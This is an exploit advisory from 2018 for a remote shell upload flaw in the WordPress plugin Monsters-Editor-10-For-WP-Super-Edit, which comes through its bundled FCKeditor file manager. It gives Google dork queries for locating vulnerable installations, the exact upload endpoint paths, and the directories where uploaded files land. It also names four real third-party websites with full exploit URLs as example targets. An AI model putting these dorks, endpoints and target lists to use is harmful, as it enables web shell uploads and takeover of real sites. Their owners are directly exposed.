###########################################################################################################
# Exploit Title : WordPress Monsters-Editor-10-For-WP-Super-Edit Plugins
2.3.1 Remote Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 20/12/2018
# Vendor Homepage : thedevcouple.com ~
wordpress.org/plugins/monsters-editor-10-for-wp-super-edit/
+ github.com/wp-plugins/monsters-editor-10-for-wp-super-edit
# Software Download Link :
downloads.wordpress.org/plugin/monsters-editor-10-for-wp-super-edit.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.1 and 2.3.1
# Exploit Risk : Medium
# Google Dorks :
inurl:''/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/''
+ intext:''Using the fMulti theme design by Fredrik Fahlstad Proudly
powered by WordPress.''
+ intext:''Website Design by Cynscreations.com.''
+ intext:''Powered by Aquino Media | Designed by Aquino Media Group''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
+ CWE-434: Unrestricted Upload of File with Dangerous Type
# Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~
ayarsecurity.com [ Friend ]
###########################################################################################################
# Exploit :
/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/browser/default/browser.html
/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/browser/default/frmupload.html
# Directory File Path :
/wp-content/uploads/......
/wp-content/uploads/[YEAR]/[MONTH]....
#################################################################################################
# Note : This plugin Monsters-Editor-10-For-WP-Super-Edit contains a very
serious vulnerability that allowed hackers to gain full control a
modify, upload and execute files on any website running WordPress. With the
plugin installed on a certain website,
a hacker or malicious person can gain access to the web server via HTTP
through a backdoor in the pluginas directory.
###########################################################################################################
Vulnerable File Code => /test.html
********************************
FCKeditor - Uploaders Tests
Select the "File Uploader" to use:
Custom Uploader URL:
Uploaded File URL:
Post URL:
###########################################################################################################
# Example Vulnerable Sites =>
[+]
dionysusrecords.com/main/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
[+]
dfrere.fr/Blog01/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
[+]
mark.langkau.org/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
[+]
tonyaquino.com/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
###########################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###########################################################################################################